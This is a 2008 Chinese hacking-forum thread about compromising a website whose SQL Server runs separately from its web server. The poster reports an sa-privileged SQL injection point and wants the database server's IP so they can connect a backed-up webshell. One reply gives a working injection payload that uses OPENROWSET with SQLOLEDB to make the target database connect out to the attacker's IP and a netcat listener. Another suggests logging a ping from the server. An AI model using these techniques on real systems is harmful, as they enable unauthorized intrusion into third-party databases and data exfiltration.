标题:
[讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
[打印本页]
作者:
valen886
时间:
2008-7-24 17:25
标题:
[讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
[讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
议题作者:ffjjc0000
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com
)
web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
得到了一个网站的注入点是sa权限的,但是不能执行命令,能备份shell但是不知道ip不能连接,请问有什么好方法没有
帖子3 精华
0
积分16 阅读权限40 性别男 在线时间17 小时 注册时间2006-5-6 最后登录2008-5-31
查看详细资料
TOP
赚更多的钱
dingking
荣誉会员
作者:
LOVE
时间:
2008-7-24 17:25
本地NC一个端口...
执行如下命令:
复制内容到剪贴板
代码:
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=你的IP,你的端口;', 'select * from dest_table') select * from src_table;--昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华
2
积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-22
查看详细资料
TOP
良辰择日,预测咨询,公司改名,权威易经
bluenight
晶莹剔透§烈日灼然
作者:
liuyi008
时间:
2008-7-24 17:25
1.如果是sa权限,而且可以执行命令,本机装个瑞星防火墙,ping下你的ip 这样你可以看到了
2.如果是db权限.public好像不可以,用楼上的即可
第2具体方法,我帮你搜到了一篇文章:
http://xherman.blog.com.cn/archives/2006/1800439.shtml
帖子30 精华
0
积分93 阅读权限40 性别女 在线时间65 小时 注册时间2007-7-22 最后登录2008-5-15
查看个人网站
查看详细资料
TOP
软件项目外包
ffjjc0000
晶莹剔透§烈日灼然
作者:
小枫
时间:
2008-7-24 17:25
谢谢大家 我去实验下
帖子3 精华
0
积分16 阅读权限40 性别男 在线时间17 小时 注册时间2006-5-6 最后登录2008-5-31
查看详细资料
TOP
逗号
晶莹剔透§烈日灼然
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
